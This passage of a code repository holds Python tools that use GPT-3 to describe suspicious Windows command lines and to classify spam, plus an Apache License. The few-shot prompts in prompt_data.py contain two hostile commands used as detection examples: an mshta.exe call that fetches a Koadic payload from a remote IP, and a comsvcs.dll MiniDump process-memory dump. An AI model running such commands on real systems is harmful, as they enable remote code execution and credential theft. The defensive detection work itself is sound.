49 |         if weight_desc_score>0 and weight_tags_score>0:
50 |             desc_score = np.dot(reference_code_emb, desc_matrix[ix])
51 |             tags_score = np.dot(tags_emb, desc_matrix[ix])
52 |             score = (1-weight_desc_score-weight_tags_score) * code_score + weight_desc_score * desc_score + weight_tags_score * tags_score
53 |         elif weight_desc_score>0:
54 |             desc_score = np.dot(reference_code_emb, desc_matrix[ix])
55 |             tags_score = .0
56 |             score = (1-weight_desc_score) * code_score + weight_desc_score * desc_score
57 |         elif weight_tags_score>0:
58 |             desc_score = .0
59 |             tags_score = np.dot(tags_emb, desc_matrix[ix])
60 |             score = (1-weight_tags_score) * code_score + weight_tags_score * tags_score
61 |         else:
62 |             desc_score = .0
63 |             tags_score = .0
64 |             score = code_score
65 |         logger.info("===\n{:.3f}, {:.3f}, {:.3f}, {:.3f}".format(
66 |             score, code_score, desc_score, tags_score))
67 |         logger.info(desc)
68 |         logger.info(generated_cmd)
69 |         score_list.append((score, code_score, desc_score, tags_score, cmd, generated_cmd, desc))
70 |     return score_list
71 |
72 |
73 | def get_sorted_similarity_score_list(
74 |     cmd,
75 |     tags,
76 |     items,
77 |     engine="text-similarity-babbage-001",
78 |     weight_desc_score=0.3,
79 |     weight_tags_score=0.2,
80 |     max_cmd_len=200
81 | ):
82 |     """
83 |     returns the score list sorted by weighted similarity score, highest first.
84 |     :param cmd: command line data
85 |     :param tags: tags data
86 |     :param items: contains a list of (desc, generated_cmd)
87 |     :param engine: engine for similarity score
88 |     :param weight_desc_score: the weight for description score
89 |     :param weight_tags_score: the weight for tags score
90 |     :param max_cmd_len: max length of command line data
91 |     """
92 |     score_list = get_embedding_similarity_score_list(
93 |         cmd, tags, items,
94 |         weight_desc_score=weight_desc_score,
95 |         weight_tags_score=weight_tags_score,
96 |         engine=engine, max_cmd_len=max_cmd_len)
97 |
98 |     return sorted(score_list, key=lambda x:x[0], reverse=True)
99 |
100 |
101 | def get_ngrams_bleu_similarity_score(
102 |     reference,
103 |     candidate_list
104 | ):
105 |     """
106 |     returns similarity scores using sentence_bleu.
107 |     :param reference: reference text
108 |     :param candidate_list: a list of candidates
109 |     """
110 |     score_list = []
111 |     for candidate in candidate_list:
112 |         reference_tokens = [reference.split()]
113 |         candidate_tokens = candidate.split()
114 |         score = sentence_bleu(reference_tokens, candidate_tokens,
115 |                               weights=(0.5, 0.5, 0., 0.))
116 |         score_list.append(score)
117 |     return score_list
118 |
119 |
120 | def get_semantic_similarity_score(
121 | reference,
122 | candidate_list,
123 | engine="text-similarity-babbage-001"
124 | ):
125 | """
126 | return similarity scores using cosine similarity with gpt3 embeddings.
127 | :param reference: reference text
128 | :param candidate_list: a list of candidates
129 | :param engine: engine for similarity score
130 | """
131 | items = [reference] + candidate_list
132 | embeddings_list = get_embeddings(items, engine=engine)
133 | reference_emb = embeddings_list[0]
134 | score_list = []
135 | for candidate_embeddings in embeddings_list[1:]:
136 | # the dot product equals cosine similarity, assuming unit-length embeddings
137 | score = np.dot(reference_emb, candidate_embeddings)
138 | score_list.append(score)
139 | return score_list
140 |
--------------------------------------------------------------------------------
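The scoring functions in similarity.py treat `np.dot` of two embeddings as a cosine similarity, which only holds when both vectors have unit length. The following is a minimal sketch of the general formula in plain Python, not the repository's implementation; the name `cosine_similarity` is a hypothetical helper introduced here for illustration.

```python
import math


def cosine_similarity(a, b):
    """Cosine similarity of two equal-length vectors (hypothetical helper)."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    # A zero vector has no direction, so report no similarity.
    if norm_a == 0.0 or norm_b == 0.0:
        return 0.0
    return dot / (norm_a * norm_b)


# For vectors that are not unit length, the raw dot product differs
# from the cosine similarity even though the directions are identical.
raw_dot = sum(x * y for x, y in zip([3.0, 4.0], [6.0, 8.0]))
cosine = cosine_similarity([3.0, 4.0], [6.0, 8.0])
```

If the embeddings returned by the API were not already normalized, dividing by the two norms as above would be needed before the weighted scores are combined.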
/command_analyzer/prompt_data.py:
--------------------------------------------------------------------------------
1 | import os
2 | import time
3 | import logging
4 | import openai
5 |
6 |
7 | openai.api_key = os.getenv("OPENAI_API_KEY")
8 |
9 | logging.getLogger("openai").setLevel(logging.ERROR)
10 | logging.basicConfig(format="%(asctime)s %(message)s",
11 | datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO)
12 | logger = logging.getLogger(__name__)
13 |
14 |
15 | STR_PREFIX_CMD = '## Command\n'
16 | STR_PREFIX_TAGS = '## Tags\n'
17 |
18 | STR_PREFIX_DESC = '## Description\nThe command'
19 | STR_PREFIX_ABOVE_DESC = '## Description\nThe above command'
20 | STR_PREFIX_BELOW_DESC = '## Description\nThe below command'
21 |
22 | STR_PREFIX_FIRST_DESC = '## Description1\nThe command'
23 | STR_PREFIX_SECOND_DESC = '## Description2\nThe command'
24 | STR_PREFIX_COMBINED_DESC = 'The Description1 and Description2 describe the Command, combine them and complete the Description.\n'
25 |
26 |
27 | PREFIX_CMD2DESC_DESC2CMD_TAG_2EXAMPLES = '''###
28 | ## Command
29 | \"cmd.exe\" \/c mshta.exe http:\/\/10.254.0.94:80\/133540\/koadic1 & timeout 5 & tasklist \/svc | findstr \/i mshta
30 | ## Tags
31 | win_pc_suspicious_tasklist_command,win_suspicious_findstr
32 | ## Description
33 | The above command will execute a suspicious mshta.exe instance on the specified URL and then timeout after 5 seconds. It will then list all services with \"mshta\" in their name using the \"tasklist \/svc\" command.
34 | ###
35 | ## Tags
36 | win_process_dump_rundll32_comsvcs,win_susp_wmi_execution,win_susp_wmic_proc_create_rundll32
37 | ## Description
38 | The below command will dump the process memory of \"rundll32.exe\" to \"C:\\windows\\temp\\scomcheck.tmp\". The \"MiniDump 572\" parameter will cause the dump to be written to a MiniDump file.
39 | ## Command
40 | \"C:\\Windows\\System32\\Wbem\\WMIC.exe\" \/privileges:enable process call create \"rundll32.exe C:\\windows\\system32\\comsvcs.dll MiniDump 572 c:\\windows\\temp\\scomcheck.tmp full\"
41 | ###
42 | '''
43 |
44 |
45 | PREFIX_CMD2DESC_DESC2CMD_2EXAMPLES ='''###
46 | ## Command
47 | \"cmd.exe\" \/c mshta.exe http:\/\/10.254.0.94:80\/133540\/koadic1 & timeout 5 & tasklist \/svc | findstr \/i mshta
48 | ## Description
49 | The above command will execute a suspicious mshta.exe instance on the specified URL and then timeout after 5 seconds. It will then list all services with \"mshta\" in their name using the \"tasklist \/svc\" command.
50 | ## Description
51 | The below command will dump the process memory of \"rundll32.exe\" to \"C:\\windows\\temp\\scomcheck.tmp\". The \"MiniDump 572\" parameter will cause the dump to be written to a MiniDump file.
52 | ## Command
53 | \"C:\\Windows\\System32\\Wbem\\WMIC.exe\" \/privileges:enable process call create \"rundll32.exe C:\\windows\\system32\\comsvcs.dll MiniDump 572 c:\\windows\\temp\\scomcheck.tmp full\"
54 | ###
55 | '''
56 |
57 |
58 | def preprocess_cmd_data(cmd, max_cmd_len):
59 | """
60 | replaces "\n" with " " and truncates the data to max_cmd_len characters.
61 | :param cmd: command line data
62 | :param max_cmd_len: the max data length
63 | """
64 | return cmd.replace("\n", " ")[:max_cmd_len]
65 |
66 |
67 | def preprocess_tags_str(tags):
68 | """
69 | replaces "susp" with "suspicious"; otherwise it can be misinterpreted as "suspended".
70 | :param tags: tags
71 | """
72 | if tags:
73 | tags = tags.replace("_susp_", "_suspicious_")
74 | return tags
75 |
76 |
77 | def get_prompt_for_desc_from_cmd_tag(
78 | cmd,
79 | tags,
80 | max_cmd_len=200,
81 | include_tag=True,
82 | include_prefix=False
83 | ):
84 | """
85 | return a prompt as
86 | ## Command
87 | cmd.exe
88 | ## Tags
89 | win_tags
90 | ## Description
91 | the above command
92 | """
93 | cmd = preprocess_cmd_data(cmd, max_cmd_len)
94 |
95 | if include_tag:
96 | prefix = PREFIX_CMD2DESC_DESC2CMD_TAG_2EXAMPLES
97 | prompt = STR_PREFIX_CMD + cmd + "\n" + STR_PREFIX_TAGS + tags + "\n" + STR_PREFIX_ABOVE_DESC
98 | else:
99 | prefix = PREFIX_CMD2DESC_DESC2CMD_2EXAMPLES
100 | prompt = STR_PREFIX_CMD + cmd + "\n" + STR_PREFIX_ABOVE_DESC
101 |
102 | if include_prefix:
103 | prompt = prefix + prompt
104 | return prompt
105 |
106 |
107 | def get_prompt_for_cmd_from_tag_desc(
108 | tags,
109 | desc,
110 | cmd,
111 | max_cmd_len=200,
112 | include_tag=True,
113 | include_prefix=False
114 | ):
115 | """
116 | returns a prompt as
117 | ## Tags
118 | win_tags
119 | ## Description
120 | the below command will ...
121 | ## Command
122 | cmd.exe
123 | """
124 | cmd = preprocess_cmd_data(cmd, max_cmd_len)
125 |
126 | if include_tag:
127 | prefix = PREFIX_CMD2DESC_DESC2CMD_TAG_2EXAMPLES
128 | prompt = STR_PREFIX_TAGS + tags + "\n" + STR_PREFIX_BELOW_DESC + desc + "\n" + STR_PREFIX_CMD + cmd
129 | else:
130 | prefix = PREFIX_CMD2DESC_DESC2CMD_2EXAMPLES
131 | prompt = STR_PREFIX_BELOW_DESC + desc + "\n" + STR_PREFIX_CMD + cmd
132 |
133 | if include_prefix:
134 | prompt = prefix + prompt
135 | return prompt
136 |
137 |
138 | def get_prompt_for_combined_desc(
139 | cmd,
140 | desc1,
141 | desc2,
142 | max_cmd_len=200
143 | ):
144 | """
145 | return a prompt as
146 | STR_PREFIX_COMBINED_DESC
147 | ## Command
148 | ...
149 | ## Description1
150 | The command
151 | ## Description2
152 | The command
153 | ## Description
154 | The command
155 | """
156 | cmd = preprocess_cmd_data(cmd, max_cmd_len)
157 |
158 | prompt = STR_PREFIX_COMBINED_DESC + STR_PREFIX_CMD + cmd + "\n" + STR_PREFIX_FIRST_DESC + desc1 + "\n"
159 | prompt += STR_PREFIX_SECOND_DESC + desc2 + "\n" + STR_PREFIX_DESC
160 | return prompt
161 |
162 |
163 | def run_openai_completion(
164 | prompt,
165 | engine,
166 | n,
167 | temperature=0.7,
168 | max_tokens=300,
169 | ):
170 | """
171 | calls openai completion api.
172 | :param prompt: prompt data
173 | :param engine: openai engine
174 | :param n: number of outputs
175 | :param temperature: temperature to control randomness, ranging between 0.0 and 1.0
176 | :param max_tokens: max output token size
177 | """
178 | # stop at "##" or a newline so that each completion stays on a single line
179 | return openai.Completion.create(
180 | prompt=prompt,
181 | engine=engine,
182 | n=n,
183 | temperature=temperature,
184 | max_tokens=max_tokens,
185 | stop=["##", "\n"]
186 | )
187 |
188 |
189 | def generate_text_list_with_prompt(
190 | prompt,
191 | engine="code-davinci-002",
192 | n=5,
193 | temperature=0.7,
194 | sleep_time=30
195 | ):
196 | """
197 | generates a list of text with the prompt.
198 | :param prompt: prompt data
199 | :param engine: openai engine
200 | :param n: number of outputs
201 | :param temperature: temperature to control randomness, ranging between 0.0 and 1.0
202 | note: max_tokens is not a parameter here; run_openai_completion uses its default (300)
203 | :param sleep_time: sleep time in seconds
204 | """
205 | text_list = []
206 | while True:
207 | #if there are temp errors, then sleep and retry
208 | try:
209 | logging.debug("prompt:{}".format(prompt))
210 | res = run_openai_completion(
211 | prompt, engine=engine, n=n, temperature=temperature)
212 | logging.debug("res:{}".format(res))
213 | text_list = [item['text'] for item in res['choices']]
214 | break
215 | except openai.error.RateLimitError as ex:
216 | logging.error("RateLimitError, ex:{}".format(ex))
217 | time.sleep(sleep_time)
218 | except openai.error.APIConnectionError as ex:
219 | logging.error("APIConnectionError, ex:{}".format(ex))
220 | time.sleep(sleep_time)
221 | return text_list
222 |
--------------------------------------------------------------------------------
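`generate_text_list_with_prompt` in prompt_data.py retries forever with a fixed sleep when the API reports a rate-limit or connection error. The following is a minimal sketch of a bounded alternative with exponential backoff. It is an illustration under stated assumptions, not the repository's behavior: `call_with_retry`, `max_attempts`, `base_delay`, and the injectable `sleep` argument are all hypothetical names introduced here.

```python
import time


def call_with_retry(func, retryable=(Exception,), max_attempts=5,
                    base_delay=1.0, sleep=time.sleep):
    """Call func(), retrying on retryable errors with exponential backoff.

    Hypothetical helper: re-raises the last error once max_attempts is reached.
    """
    for attempt in range(1, max_attempts + 1):
        try:
            return func()
        except retryable:
            if attempt == max_attempts:
                raise
            # Wait base_delay, then 2x, 4x, ... before the next attempt.
            sleep(base_delay * 2 ** (attempt - 1))


# Usage example with a function that fails twice before succeeding.
# The delays are recorded instead of slept so the example runs instantly.
calls = {"count": 0}
delays = []


def flaky():
    calls["count"] += 1
    if calls["count"] < 3:
        raise ConnectionError("temporary failure")
    return "ok"


result = call_with_retry(flaky, retryable=(ConnectionError,),
                         base_delay=1.0, sleep=delays.append)
```

In the repository's setting, `retryable` would presumably be the two `openai.error` exception types the original loop catches; capping the attempts trades unattended robustness for a guarantee that the call eventually returns or fails.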
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "[]"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright [yyyy] [name of copyright owner]
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
--------------------------------------------------------------------------------
/spam_detector/gpt3_models.py:
--------------------------------------------------------------------------------
1 | import os
2 | import time
3 | import pandas as pd
4 | import logging
5 | from sklearn.metrics import classification_report
6 | import openai
7 |
8 |
9 | # set your openai api key
10 | openai.api_key = os.getenv("OPENAI_API_KEY")
11 | # disable openai's logging messages
12 | logging.getLogger("openai").setLevel(logging.ERROR)
13 |
14 | logging.basicConfig(format="%(asctime)s %(message)s",
15 | datefmt="%Y-%m-%d %H:%M:%S", level=logging.INFO)
16 | logger = logging.getLogger(__name__)
17 |
18 |
19 | PROMPT_TEMPLATE = "Classify the {data_type} as {positive_label} or {negative_label}."
20 | EXAMPLE_TEMPLATE = "\n{data_type}: {text}\nLabel: {label}"
21 | QUERY_TEMPLATE = "\n{data_type}: {text}\nLabel:"
22 |
23 |
24 | def generate_prompt_text(
25 | df,
26 | data_type="Message",
27 | positive_label="Spam",
28 | negative_label="Ham",
29 | column_text="text",
30 | column_label="label"
31 | ):
32 | """
33 | generate a prompt from the input df.
34 | :param df: data frame for input data
35 | :param data_type: the type of data
36 | :param positive_label: the value for positive label
37 | :param negative_label: the value for negative label
38 | :param column_text: column for text
39 | :param column_label: column for label
40 | """
41 | prompt = PROMPT_TEMPLATE.format(
42 | data_type=data_type, positive_label=positive_label, negative_label=negative_label)
43 | if df is None or len(df) == 0:
44 | return prompt
45 |
46 | for _ix, row in df.iterrows():
47 | text = row[column_text]
48 | label = row[column_label]
49 | example_text = EXAMPLE_TEMPLATE.format(
50 | data_type=data_type, text=text, label=label)
51 | prompt += example_text
52 | return prompt
53 |
54 |
55 | def get_openai_completion(
56 | prompt,
57 | model_name="text-davinci-002",
58 | max_tokens=6,
59 | sleep_time=60
60 | ):
61 | """
62 | get a completion response from openai.
63 | :param prompt: the input prompt
64 | :param model_name: model name
65 | :param max_tokens: the max token size for response
66 | :param sleep_time: sleep time in seconds
67 | """
68 | label = None
69 | while True:
70 | try:
71 | logging.debug("prompt:{}".format(prompt))
72 | res = openai.Completion.create(
73 | model=model_name,
74 | prompt=prompt,
75 | max_tokens=max_tokens,
76 | temperature=0,
77 | stop="\n"
78 | )
79 | logging.debug("res:{}".format(res))
80 |
81 | # strip surrounding whitespace and return the first word as the label (None if the completion is empty).
82 | completion = res["choices"][0]["text"].strip()
83 | label = completion.split()[0] if completion else None
84 | break
85 | except openai.error.RateLimitError as ex:
86 | logging.info("RateLimitError, ex:{}".format(ex))
87 | time.sleep(sleep_time)
88 | except openai.error.APIConnectionError as ex:
89 | logging.info("APIConnectionError, ex:{}".format(ex))
90 | time.sleep(sleep_time)
91 | return label
92 |
93 |
94 | def upload_train_jsonl_file(
95 | path_jsonl,
96 | df_train,
97 | data_type="Message",
98 | positive_label="Spam",
99 | negative_label="Ham",
100 | column_text="text",
101 | column_label="label",
102 | purpose="fine-tune",
103 | fine_tune_context_sample_size=4
104 | ):
105 | """
106 | upload a train jsonl file to openai.
107 | :param path_jsonl: the path for training jsonl file
108 | :param df_train: df for training data
109 | :param data_type: data type
110 | :param positive_label: the value for positive label
111 | :param negative_label: the value for negative label
112 | :param column_text: column for text
113 | :param column_label: column for label
114 | :param purpose: the purpose of training data, fine-tune or classifications
115 | :param fine_tune_context_sample_size: the sample size for prompt context
116 | """
117 | text_label = "Label:"
118 | dict_items = []
119 | for ix in range(0, len(df_train), fine_tune_context_sample_size):
120 | df_items = df_train.iloc[ix:ix+fine_tune_context_sample_size]
121 | context_prompt = generate_prompt_text(
122 | df_items, data_type=data_type,
123 | positive_label=positive_label, negative_label=negative_label,
124 | column_text=column_text, column_label=column_label)
125 | label_idx = context_prompt.rfind(text_label) + len(text_label)
126 | prompt = context_prompt[:label_idx]
127 | completion = context_prompt[label_idx:]
128 | dict_items.append({"prompt": prompt, "completion": completion})
129 |
130 | df = pd.DataFrame(dict_items)
131 | df.to_json(path_jsonl, orient="records", lines=True)
132 | logger.info("train_jsonl:{}, df.shape:{}".format(path_jsonl, df.shape))
133 |
134 | # upload the file to openai
135 | try:
136 | res = openai.File.create(file=open(path_jsonl), purpose=purpose)
137 | train_file_id = res["id"]
138 | except Exception as ex:
139 | logger.error("openai.File.create() got an error, ex:{}".format(ex))
140 | train_file_id = None
141 | return train_file_id
142 |
143 |
144 | def retrieve_openai_model(fine_tune_id):
145 | """
146 | retrieve the status of model fine-tuning.
147 | :param fine_tune_id: the id for model
148 | """
149 | try:
150 | res = openai.FineTune.retrieve(id=fine_tune_id)
151 | id = res["id"]
152 | status = res["status"] # the status will be succeeded when completed.
153 | fine_tuned_model = res["fine_tuned_model"]
154 | logger.info("id:{}, status:{}, fine_tuned_model:{}".format(
155 | id, status, fine_tuned_model))
156 | except Exception as ex:
157 | logger.error("openai.FineTune.retrieve() got an error, ex:{}".format(ex))
158 | status, fine_tuned_model = None, None
159 | return status, fine_tuned_model
160 |
161 |
162 | def finetune_openai_model(
163 | training_file_id,
164 | suffix="detection",
165 | model="davinci",
166 | n_epochs=2,
167 | sleep_time_for_finetuning=60
168 | ):
169 | """
170 | fine-tune an openai model.
171 | :param training_file_id: the file id for training data
172 | :param suffix: suffix for the model name
173 | :param model: the baseline model name
174 | :param n_epochs: number of training epochs
175 | :param sleep_time_for_finetuning: sleep time in seconds
176 | """
177 | logger.info("## finetune_openai_model: {}".format(locals()))
178 |
179 | try:
180 | res = openai.FineTune.create(training_file=training_file_id,
181 | suffix=suffix,
182 | model=model,
183 | n_epochs=n_epochs)
184 | fine_tune_id = res["id"]
185 | status = res["status"]
186 | fine_tuned_model = res["fine_tuned_model"]
187 | logger.info("fine_tune_id:{}, status:{}, fine_tuned_model:{}".format(
188 | fine_tune_id, status, fine_tuned_model))
189 | except Exception as ex:
190 | logger.error("openai.FineTune.create() got an error, ex:{}".format(ex))
191 | return None
192 | fine_tuned_model = None
193 | if sleep_time_for_finetuning > 0:
194 | while status not in ("succeeded", "failed", "cancelled"):
195 | time.sleep(sleep_time_for_finetuning)
196 | try:
197 | status, fine_tuned_model = retrieve_openai_model(fine_tune_id)
198 | logger.info("finetuning status:{}".format(status))
199 | except Exception as ex:
200 | logger.info(
201 | "finetuning retrieve_openai_model ex:{}".format(ex))
202 | logger.info("finetuning status response:{}".format(res))
203 | return fine_tuned_model
204 |
205 |
206 | def fine_tune_gpt3_model(
207 | df_train,
208 | path_train_jsonl,
209 | model_name,
210 | data_type="Message",
211 | positive_label="Spam",
212 | negative_label="Ham",
213 | column_text="text",
214 | column_label="label",
215 | fine_tune_context_sample_size=4
216 | ):
217 | """
218 | fine-tune a gpt3 model with the training dataset.
219 | :param df_train: df for training data
220 | :param path_train_jsonl: file path for training json file
221 | :param model_name: baseline model name
222 | :param data_type: data type
223 | :param positive_label: the value for positive label
224 | :param negative_label: the value for negative label
225 | :param column_text: the column for text
226 | :param column_label: the column for label
227 | :param fine_tune_context_sample_size: sample size for context prompt
228 | """
229 | training_file_id = upload_train_jsonl_file(
230 | path_train_jsonl,
231 | df_train,
232 | data_type=data_type,
233 | positive_label=positive_label,
234 | negative_label=negative_label,
235 | column_text=column_text,
236 | column_label=column_label,
237 | purpose="fine-tune",
238 | fine_tune_context_sample_size=fine_tune_context_sample_size
239 | )
240 | logger.info("training_file_id:{}".format(training_file_id))
241 | if training_file_id is None:
242 | return None
243 |
244 | fine_tuned_model_train = finetune_openai_model(
245 | training_file_id=training_file_id,
246 | suffix="detection_{}".format(data_type.lower()),
247 | model=model_name,
248 | n_epochs=2,
249 | sleep_time_for_finetuning=60
250 | )
251 | logger.info("fine_tuned_model_train:{}".format(fine_tuned_model_train))
252 | return fine_tuned_model_train
253 |
254 |
255 | def classify_message(
256 | message,
257 | path_train_data="spam_data/experiment_1/train_2.csv",
258 | num_samples_in_prompt=2
259 | ):
260 | """
261 | classify the input message as spam or ham.
262 | the spam_data/experiment_1/train_2.csv file has one ham sample and one spam sample.
263 | :param message: message data
264 | :param path_train_data: file path for few-shot samples
265 | :param num_samples_in_prompt: the number of samples in prompt
266 | """
267 | df_train = pd.read_csv(path_train_data, sep="\t")[:num_samples_in_prompt]
268 |
269 | context_prompt = generate_prompt_text(
270 | df_train, data_type="Message",
271 | positive_label="Spam", negative_label="Ham",
272 | column_text="text", column_label="label")
273 |
274 | query_text = QUERY_TEMPLATE.format(data_type="Message", text=message)
275 | prompt = context_prompt + query_text
276 | logger.info("prompt:{}".format(prompt))
277 |
278 | label = get_openai_completion(prompt, model_name="text-davinci-002")
279 | logger.info("label:{}".format(label))
280 | return label
281 |
282 |
283 | def evaluate_gpt3_model(
284 | path_train_data,
285 | path_test_data,
286 | model_name="text-davinci-002",
287 | data_type="Message",
288 | column_text="text",
289 | column_label="label",
290 | positive_label="Spam",
291 | negative_label="Ham",
292 | fine_tune=False,
293 | fine_tuned_model="",
294 | fine_tune_context_sample_size=4,
295 | prompt_context_sample_size=3,
296 | sleep_time=1
297 | ):
298 | """
299 | evaluate a gpt3 model with training and test datasets.
300 | :param path_train_data: path for training dataset
301 | :param path_test_data: path for test dataset
